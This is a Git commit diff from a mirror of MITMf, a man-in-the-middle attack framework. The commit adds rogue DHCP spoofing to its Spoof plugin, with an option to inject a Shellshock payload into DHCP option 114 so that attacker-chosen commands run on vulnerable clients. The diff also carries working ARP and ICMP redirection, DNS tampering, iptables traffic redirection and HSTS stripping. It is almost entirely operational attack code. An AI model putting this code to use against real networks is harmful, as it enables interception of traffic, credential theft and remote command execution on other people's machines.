github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-06 21:12:16 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

added DHCP spoofing with shellshock options

Browse source
This commit is contained in:
byt3bl33d3r 2014-09-30 14:13:06 +02:00
parent ff235e3e90
commit 43c7974d4c
7 changed files with 155 additions and 69 deletions
Download patch file Download diff file Expand all files Collapse all files

4
config_files/dhcp.cfg Normal file
View file

@ -0,0 +1,4 @@
#Example config file for DHCP spoofing
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional

2
config_files/dns.cfg
View file

@ -1,3 +1,3 @@
#Example config file for dns spoofing #Example config file for DNS tampering
www.facebook.com = 192.168.10.1 www.facebook.com = 192.168.10.1
google.com = 192.168.10.1 google.com = 192.168.10.1

11
mitmf.py
View file

@ -21,11 +21,11 @@ sergio_version = "0.2.1"
if __name__ == "__main__": if __name__ == "__main__":
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version,epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add sslstrip options #add sslstrip options
sgroup = parser.add_argument_group("sslstrip","Options for sslstrip library") sgroup = parser.add_argument_group("sslstrip", "Options for sslstrip library")
sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).")
sgroup.add_argument("--log-level", type=str,choices=['debug','info'], default="info", help="Specify a log level [default: info]") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
slogopts = sgroup.add_mutually_exclusive_group() slogopts = sgroup.add_mutually_exclusive_group()
slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)") slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. (default)")
slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.")
@ -33,6 +33,7 @@ if __name__ == "__main__":
sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
#Initialize plugins #Initialize plugins
plugins = [] plugins = []
@ -75,6 +76,10 @@ if __name__ == "__main__":
print "Plugin %s lacked initialize function." % p.name print "Plugin %s lacked initialize function." % p.name
#Plugins are ready to go, start MITMf #Plugins are ready to go, start MITMf
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
reactor.run()
else:
URLMonitor.getInstance().setFaviconSpoofing(args.favicon) URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions) CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load) ProxyPlugins.getInstance().setPlugins(load)

2
plugins/FilePwn.py
View file

@ -292,4 +292,4 @@ class FilePwn(Plugin):
return {'request': request, 'data': data} return {'request': request, 'data': data}
def add_options(self, options): def add_options(self, options):
options.add_argument("--filepwncfg", type=file, help="Specify a config file") options.add_argument("--filepwncfg", type=file, help="Specify a config file [default: filepwn.cfg]")

2
plugins/JavaPwn.py
View file

@ -41,7 +41,7 @@ class JavaPwn(BrowserProfiler, Plugin):
for key, value in self.javacfg.iteritems(): for key, value in self.javacfg.iteritems():
self.javaVersionDic[float(key)] = value self.javaVersionDic[float(key)] = value
self.sploited_ips = [] #store ip of pwned or not vulnarable clients so we don't re-exploit self.sploited_ips = [] #store ip of pwned or not vulnerable clients so we don't re-exploit
try: try:
msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary

165
plugins/Spoof.py
View file

@ -13,6 +13,8 @@ from scapy.all import *
import os import os
import sys import sys
import threading import threading
import binascii
import random
try: try:
from configobj import ConfigObj from configobj import ConfigObj
@ -23,7 +25,7 @@ except:
class Spoof(Plugin): class Spoof(Plugin):
name = "Spoof" name = "Spoof"
optname = "spoof" optname = "spoof"
desc = 'Redirect traffic using ICMP, ARP or DNS' desc = 'Redirect/Modify traffic using ICMP, ARP or DHCP'
has_opts = True has_opts = True
def initialize(self, options): def initialize(self, options):
@ -33,15 +35,16 @@ class Spoof(Plugin):
self.arp = options.arp self.arp = options.arp
self.icmp = options.icmp self.icmp = options.icmp
self.dns = options.dns self.dns = options.dns
#self.dhcp = options.dhcp self.dnscfg = "./config_files/dns.cfg" or options.dnscfg
self.domain = options.domain self.dhcp = options.dhcp
self.dnsip = options.dnsip self.dhcpcfg = "./config_files/dhcp.cfg" or options.dhcpcfg
self.dnscfg = options.dnscfg self.shellshock = options.shellshock
self.cmd = "echo 'pwned'" or options.cmd
self.gateway = options.gateway self.gateway = options.gateway
self.summary = options.summary #self.summary = options.summary
self.target = options.target self.target = options.target
self.arpmode = options.arpmode self.arpmode = options.arpmode
self.port = self.options.listen self.port = options.listen
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False self.debug = False
self.send = True self.send = True
@ -49,6 +52,9 @@ class Spoof(Plugin):
if os.geteuid() != 0: if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges") sys.exit("[-] Spoof plugin requires root privileges")
if not self.interface:
sys.exit('[-] Spoof plugin requires --iface argument')
if self.options.log_level == 'debug': if self.options.log_level == 'debug':
self.debug = True self.debug = True
@ -57,12 +63,6 @@ class Spoof(Plugin):
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if self.arp: if self.arp:
if self.icmp:
sys.exit("[-] --arp and --icmp are mutually exclusive")
if (not self.interface or not self.gateway):
sys.exit("[-] ARP Spoofing requires --gateway and --iface")
self.mac = get_if_hwaddr(self.interface) self.mac = get_if_hwaddr(self.interface)
self.routermac = getmacbyip(self.gateway) self.routermac = getmacbyip(self.gateway)
print "[*] ARP Spoofing enabled" print "[*] ARP Spoofing enabled"
@ -70,50 +70,125 @@ class Spoof(Plugin):
pkt = self.build_arp_req() pkt = self.build_arp_req()
elif self.arpmode == 'rep': elif self.arpmode == 'rep':
pkt = self.build_arp_rep() pkt = self.build_arp_rep()
thread_target = self.send
thread_args = (pkt, self.interface, self.debug,)
elif self.icmp: elif self.icmp:
if self.arp:
sys.exit("[-] --icmp and --arp are mutually exclusive")
if (not self.interface or not self.gateway or not self.target):
sys.exit("[-] ICMP Redirection requires --gateway, --iface and --target")
self.mac = get_if_hwaddr(self.interface) self.mac = get_if_hwaddr(self.interface)
self.routermac = getmacbyip(self.gateway) self.routermac = getmacbyip(self.gateway)
print "[*] ICMP Redirection enabled" print "[*] ICMP Redirection enabled"
pkt = self.build_icmp() pkt = self.build_icmp()
thread_target = self.send
thread_args = (pkt, self.interface, self.debug,)
if self.summary: elif self.dhcp:
pkt.show() print "[*] DHCP Spoofing enabled"
ans = raw_input('\n[*] Continue? [Y|n]: ').lower() self.rand_number = []
if ans == 'y' or len(ans) == 0: self.dhcp_dic = {}
pass self.dhcpcfg = ConfigObj(self.dhcpcfg)
else: thread_target = self.dhcp_sniff
sys.exit(0) thread_args = ()
if self.dns: if self.dns:
if not self.dnscfg: print "[*] DNS Tampering enabled"
if (not self.dnsip or not self.domain):
sys.exit("[-] DNS Spoofing requires --domain, --dnsip")
elif self.dnscfg:
self.dnscfg = ConfigObj(self.dnscfg) self.dnscfg = ConfigObj(self.dnscfg)
if not self.manualiptables: if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
print "[*] DNS Spoofing enabled"
self.start_dns_queue() self.start_dns_queue()
file = open('/proc/sys/net/ipv4/ip_forward', 'w') file = open('/proc/sys/net/ipv4/ip_forward', 'w')
file.write('1') file.write('1')
file.close() file.close()
if not self.manualiptables: if not self.manualiptables:
print '[*] Setting up iptables rules' print '[*] Setting up iptables'
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port) os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
t = threading.Thread(name='send_packets', target=self.send_packets, args=(pkt, self.interface, self.debug,)) t = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
t.setDaemon(True) t.setDaemon(True)
t.start() t.start()
def dhcp_rand_ip(self):
pool = self.dhcpcfg['ip_pool'].split('-')
trunc_ip = pool[0].split('.'); del(trunc_ip[3])
max_range = int(pool[1])
min_range = int(pool[0].split('.')[3])
number_range = range(min_range, max_range)
for n in number_range:
if n in self.rand_number:
number_range.remove(n)
rand_number = random.choice(number_range)
self.rand_number.append(rand_number)
rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)
return rand_ip
def dhcp_callback(self, resp):
if resp.haslayer(DHCP):
xid = resp[BOOTP].xid
mac_addr = resp[Ether].src
raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
if xid in self.dhcp_dic.keys():
client_ip = self.dhcp_dic[xid]
else:
client_ip = self.dhcp_rand_ip()
self.dhcp_dic[xid] = client_ip
if resp[DHCP].options[0][1] == 1:
logging.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
logging.info("Sending DHCP OFFER")
packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') /
IP(src=get_if_addr(self.interface), dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', get_if_addr(self.interface)),
('subnet_mask', self.dhcpcfg['subnet']),
('router', get_if_addr(self.interface)),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
"end"]))
try:
packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
except KeyError:
pass
sendp(packet, iface=self.interface, verbose=self.debug)
if resp[DHCP].options[0][1] == 3:
logging.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') /
IP(src=get_if_addr(self.interface), dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', get_if_addr(self.interface)),
('subnet_mask', self.dhcpcfg['subnet']),
('router', get_if_addr(self.interface)),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240)]))
try:
packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
except KeyError:
pass
if self.shellshock:
logging.info("Sending DHCP ACK with shellshock payload")
packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.cmd)))
packet[DHCP].options.append("end")
else:
logging.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
sendp(packet, iface=self.interface, verbose=self.debug)
def dhcp_sniff(self):
sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)
def send_packets(self, pkt, interface, debug): def send_packets(self, pkt, interface, debug):
while self.send: while self.send:
sendp(pkt, inter=2, iface=interface, verbose=debug) sendp(pkt, inter=2, iface=interface, verbose=debug)
@ -168,7 +243,7 @@ class Spoof(Plugin):
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip)) DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=ip))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt)) payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
logging.info("%s Spoofed DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
def start_dns_queue(self): def start_dns_queue(self):
self.q = nfqueue.queue() self.q = nfqueue.queue()
@ -191,19 +266,21 @@ class Spoof(Plugin):
return 'queue' return 'queue'
def add_options(self,options): def add_options(self,options):
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing') group = options.add_mutually_exclusive_group(required=False)
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects') group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests') group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
# options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers') group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
options.add_argument('--cmd', type=str, dest='cmd', help='Command to run on vulnerable clients [default: echo pwned]')
options.add_argument("--dnscfg", type=file, help="DNS tampering config file [default: dns.cfg]")
options.add_argument("--dhcpcfg", type=file, help="DHCP spoofing config file [default: dhcp.cfg]")
options.add_argument('--iface', dest='interface', help='Specify the interface to use') options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP') options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]') options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]') options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--domain', type=str, dest='domain', help='Domain to spoof [e.g google.com]') options.add_argument('--manualiptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
options.add_argument('--dnsip', type=str, dest='dnsip', help='IP address to resolve dns queries to')
options.add_argument("--dnscfg", type=file, help="Specify a config file")
options.add_argument('--manualiptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables of flush iptables rules automatically')
def finish(self): def finish(self):
self.send = False self.send = False
@ -212,7 +289,7 @@ class Spoof(Plugin):
file.write('0') file.write('0')
file.close() file.close()
if not self.manualiptables: if not self.manualiptables:
print '\n[*] Flushing iptables rules' print '\n[*] Flushing iptables'
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if self.dns: if self.dns:

4
sslstrip/ClientRequest.py
View file

@ -55,11 +55,11 @@ class ClientRequest(Request):
if 'accept-encoding' in headers: if 'accept-encoding' in headers:
headers['accept-encoding'] == 'identity' headers['accept-encoding'] == 'identity'
logging.debug("zapped encoding") logging.debug("Zapped encoding")
if 'Strict-Transport-Security' in headers: #kill new hsts requests if 'Strict-Transport-Security' in headers: #kill new hsts requests
del headers['Strict-Transport-Security'] del headers['Strict-Transport-Security']
logging.debug("zapped a HSTS request") logging.info("Zapped a HSTS request")
if 'if-modified-since' in headers: if 'if-modified-since' in headers:
del headers['if-modified-since'] del headers['if-modified-since']